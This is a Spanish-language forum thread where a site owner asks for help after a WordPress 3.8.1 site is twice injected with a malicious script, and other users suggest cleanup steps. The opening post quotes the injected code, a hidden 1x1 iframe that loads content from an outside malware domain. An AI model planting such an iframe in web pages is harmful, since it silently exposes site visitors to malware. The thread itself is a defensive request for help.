Wordpress 3.8.1 hackeado dos veces con script iframe malicioso.

Estado
No está abierto para más respuestas.
Mensajes
2
Puntuación de reacción
0
Buenas,

En poco menos de una semana, en un Wordpress que gestiono me han metido un script iframe malicioso:

Código:
<iframe src="http://sisisis.net/asistent6765765745/?id=mx " width="1" height="1" frameborder="0">

Google lo ha detectado como tal y ha bloqueado el acceso al site con el típico aviso en el navegador "Este sitio web contiene software malicioso".

La primera vez lo solucioné actualizando el CMS a la última versión e instalando el plugin Wordfence para prevenir nuevos ataques. Funcionó esa vez, pero hoy me encuentro que Google ha vuelto a bloquear el site y no me queda ninguna carta por jugar, porque no se dónde está ubicado el código malicioso. Google me señala como url infectadas la ruta de una etiqueta de Wordpress, por ejemplo. No encuentro (parece que no existe) el código citado en ningún archivo del FTP. ¿Qué puedo hacer?

Muchísimas gracias y un saludo.
 

xtremmetal

Cobre
Usuario de Bronce
Mensajes
928
Puntuación de reacción
0
Cuanto te hackearon la primera vez... ¿Cambiaste las contraseñas? Un iframe de ese tipo lo suelen colar manualmente. Lo que puedes hacer es bajarte la ultima versión de wordpress al PC y subirlo. Con eso ya te queda solo mirar en el theme y .htaccess.
 

Silvia77

Cobre
Usuario de Bronce
Mensajes
777
Puntuación de reacción
0
y si has puesto themes o plugins nulled revisalos o quitalos
 

Zeokat

Oro
Usuario de Bronce
Mensajes
1,194
Puntuación de reacción
4
La seguridad en WordPress en contra de lo que muchos piensen no es instalar un plugin o seguir un tutorial...

¿Que tienes un hosting compartido o un VPS?

¿Usas algun theme/plugin nulled?

El codigo malicioso no tiene porque ser un iframe, podria ser un javascript. Muchas veces el código malicioso te lo cuelan en el archivo functions.php pegale una ojeada.
 
Estado
No está abierto para más respuestas.
Arriba